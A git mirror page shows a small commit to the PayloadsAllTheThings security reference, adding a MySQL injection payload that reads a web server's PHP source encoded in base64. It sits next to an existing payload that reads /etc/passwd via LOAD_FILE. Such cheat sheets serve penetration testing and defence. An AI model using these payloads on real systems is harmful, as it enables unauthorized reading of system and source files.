1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-23 13:16:10 +02:00

Merge pull request #422 from A1vinSmith/master

Update MySQL Injection.md
This commit is contained in:
Swissky 2021-09-25 18:17:10 +02:00 committed by GitHub
commit e68dc99749
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -389,6 +389,10 @@ Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
```
```sql
UNION ALL SELECT TO_base64(LOAD_FILE('/var/www/html/index.php'));
```
If you are `root` on the database, you can re-enable the `LOAD_FILE` using the following query
```sql